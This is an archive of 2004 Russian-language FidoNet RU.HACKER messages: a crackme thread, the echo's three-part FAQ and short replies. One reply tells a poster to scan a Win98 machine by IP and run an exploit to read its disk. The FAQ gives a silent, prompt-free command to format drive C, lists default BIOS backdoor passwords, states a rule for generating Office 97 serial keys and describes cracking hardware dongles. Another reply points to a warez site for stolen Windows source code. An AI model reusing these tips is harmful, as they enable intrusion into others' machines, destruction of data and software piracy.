MR=.R`,JA\O%5=CANBW'SX[9L<09,*U;(RSA,%R*+\^,NH'S+U.&XB;]D,3N^ M%^CF4*RD.`21V""+VY9!PZAS4QVLB%_1KVPS4]I=*,[3Q*/`\'98."E642N_ M%HN^+%:K8J6";R/O_`0Z)M4=@K1&!*/?;,5?KHWA>6\3`]<@43PC_KY"0?G% M`U0.+'06[/.O"G'O<.4!8^3":A%DN%,!'KJU:;%0:VTPF5IA67TT?)B#86#B%8`:CTLKTR4KX7TM6-?1OP39G&('0R3PQ8P#2-AFO:D=&W_Z M8/?E'0Q&>5@+1B:ZK[K]J$I[7H5/([D>SVI/:XD\2)/^(^R&C__A&PJZCY/U M==8FGQL+K?,;ZRZ:B[*O*ND62.RG8_RIQCP[JG.LP64TLICHC8K&DWL_(%S7 M4J?K;&B#7W&@L:R3X+;I3WI;&*]131!\'('\A]JR8G32>D<2O+"&#)2@7`0@ M=@,V\70Q-=(7Q8)A!Q_``]CH-7K>^G*".\&P?AJ^2CFE^O,QW%AB_L+1W[9N M':O_3278[Y#-+D;]?67B@96^1SWO@=-QJ^UP`8=3(]*?6L`#8_!$>,=>^C2?S-FX%-U!0W3N*CSZPY_O,LP7B# M.O+*U8OUO"YOZ;J;X#&E^NI_MN&Q>610:QP9B[TZT;(.NQ^A;A>"#^U!QNA4 MW$FI7<,I7?R9I-\G9<47HGC8()BH`/3L@`#G%2`=IN]<%CH%56"\["G&'QU+ M5G<@PF1`Z.!O**\I'.?,,W+CAPMJNE5RBRZSR.I),CYME5#K/@0.6<<6$0R5;]R=ABSH[>B]KRK#3B,L%?<"RBC_3##@7<_7 M>TE$Q4`9->SQ@UG)8KK#K<#OM6J5^A&L^3^P@K_X)0S\5)_OZ2`Z-J"@XU!0 M0`;[B[#31;_#:9R!Y=(JS_0`0J:.M[I)GF+?Z1%_:9P>@1<%#8P.I(D$QM<* -B;_J0?[0Q#U[`$`'```` ` end sum -r/size 57110/2263 Всего хорошего, Evgeni. --- Растения полезны - выделяют кислород, жизненно необходимый автомобилям. * Origin: Бред какой-то, а не ориджин! (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 9042 [1-10330] K/s From : Evgeni Asoskov 01-Mar-04 20:42:20 2:5027/16.14 To : Ivan Ushakov 2:5004/57.26 Subj : Re: crackme =====================================================================RU.HACKER= Привет Ivan! Отвечаю на ваше письмо от 28.02.04, тогда писал(а) Ivan Ushakov к JokeR[FHC], а было тогда на часах 23:12:06. IU> А по поводу самого crackme то я бросил в нем копатся ибо для написания IU> кейгена необходимо написать код, совершающий обратное действие: из хеша IU> username получаем необходимый пароль. А там столько математики(взять IU> хотябы "процедуру" label4: мне, например, неясно как там по числу получить IU> последовательность индексов символов(совершить обратное этой процедуре IU> действие)). Про label6 и label5 я вообще тихо молчу ибо там обратный ход IU> вообще непонятен. Единственный(для меня) вариант - скопировать блоки IU> label4,label6,label5 и написать брутфорс, который и подыщет такой пароль, IU> чтобы при прохождении вышеупомянутых трех "процедур" он давал хеш равный IU> ранее полученному хешу username. IU> Хотя, возможно я недопонял скрипт. Авторское решение идет следом... А брутфорс не пройдет. слишком медленно. Всего хорошего, Evgeni. --- на 15 минут поцелуя способен только пылесос... * Origin: Бред какой-то, а не ориджин! (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 9043 [1-10330] From : Sergey Rakin 02-Mar-04 23:53:47 2:5054/74.22 To : Daniil Uspensky 2:5030/1551.7 Subj : Win98 =====================================================================RU.HACKER= Hi !! DU> Что можно сделать с сабжем, зная фиксированный IP адрес? Хотелось бы DU> почитать содержимое винта... 1) Проверяешь этот ip и смотришь какие порты открыты (если 25 то коннектишся к этой машине через телнет или ftp-клиент 2) Запускаешь эксплоит с параметром этого айпи и ждешь, если там одна дыра в винде не заляпана, то ты на его винте(в консоле, то есть дос Bye Daniil! ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.5-20020104 * Origin: [Sergey Rakin AKA ] (2:5054/74.22) = Здесь обитают хакеры ====================================================New= Msg : 9044 [1-10330] K/s From : Moderator's Post 03-Mar-04 00:00:04 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9045 [1-10330] K/s From : Moderator's Post 03-Mar-04 00:00:04 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9046 [1-10330] K/s From : Moderator's Post 03-Mar-04 00:00:04 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9047 [1-10330] K/s From : Evgeny Kostin 03-Mar-04 07:09:05 2:5027/12.56 To : Aleksey Ermak 2:5062/6.16 Subj : Re: Slobo? =====================================================================RU.HACKER= AE> а тебе слабо веньпоинт настроить? AE> если - надо могу помочь. Привет Алексей! Спосибо конечно но уже настроил ... --- WP/95 Rel 1.78E (215.0) Reg. * Origin: WinPoint 95 (2:5027/12.56) = Здесь обитают хакеры ====================================================New= Msg : 9048 [1-10330] K/s From : Aleksey Ermak 02-Mar-04 13:38:12 2:5062/6.16 To : Evgeny Kostin 2:5027/12.56 Subj : Slobo? =====================================================================RU.HACKER= *╒═╡(green_3mii:* /*_www.zmii.by.ru_*/ *) > > > Тебе :"Hi"╞════╡_╞═╡¤╞═╡X╞═══╕* 01.03.2004 20:47, Evgeny Kostin -> All: EK> Hароae, кому не слабо сломатue сайт study.orn.ru. Вроdе dырявый dо EK> смерти но что-то там не так ... не ломается не поd каким преdлогом а тебе слабо веньпоинт настроить? если - надо могу помочь. *╘══╡Готово╞════╡* /*www.zmii.by.ru*/ *╞═════╡Time 13:38╞════╡ FIDOnet ╞═══╛* слyшаю: 007 - 16_Koni priveredlivie --- ...но один не подставит за всех плечо... * Origin: [ Загасить (жидо)МАСЯHЮ ] [ Зверски заколбасить!!! ] (2:5062/6.16) = Здесь обитают хакеры ====================================================New= Msg : 9049 [1-10330] From : Dmitry Gusev 02-Mar-04 13:23:45 2:5055/233.4 To : Renat Khaliullin 2:5084/30.34 Subj : Исходники Windows =====================================================================RU.HACKER= Respect, Renat 29 Фев 04 22:03, u wrote 2 All: RK> Слышал, у Microsoft украли сабж. Hикто не видел ссылки на сабж в RK> Интернете? Зайди на wareza.net; там есть, точно.. dimedrol np: Metallica - The Unforgiven II --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Там, где раньше тигры срали, мы проложим магистрали (2:5055/233.4) = Здесь обитают хакеры ====================================================New= Msg : 9050 [1-10330] From : Maxim Usenko 01-Mar-04 23:36:46 2:5009/2.139 To : Konstantin Reus 2:5031/52.10 Subj : SoftIce =====================================================================RU.HACKER= --- 27 февpаля 04 _Konstantin Reus_ -> _All sabj "SoftIce" --- /больших тебе пpиветов Konstantin/ KR> Сабж пpи bpx hmemcpy пишет "symbol not defined (hmemcpy)". KR> Что это такое и как фиксить? винда nt/xp/2k3 ?!?! нет там такой функции =) --- /до скоpой встpечи/ [>] (hed) P.E. - Half the Man --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 9051 [1-10330] From : Dmitry Vladimirov 03-Mar-04 00:17:07 2:463/635.10 To : Konstantin Reus 2:5031/52.10 Subj : SoftIce =====================================================================RU.HACKER= Hi Konstantin! 27 Февраля 04 г. 14:52, ты обращался к All: KR> Сабж при bpx hmemcpy пишет "symbol not defined (hmemcpy)". KR> Что это такое А это правда. KR> и как фиксить? Поставить обратно Win98 Если она все же таки да стоит, то раскоментировать импорты внизу в файле winice.da C наступающим Hовым Годом! :-) 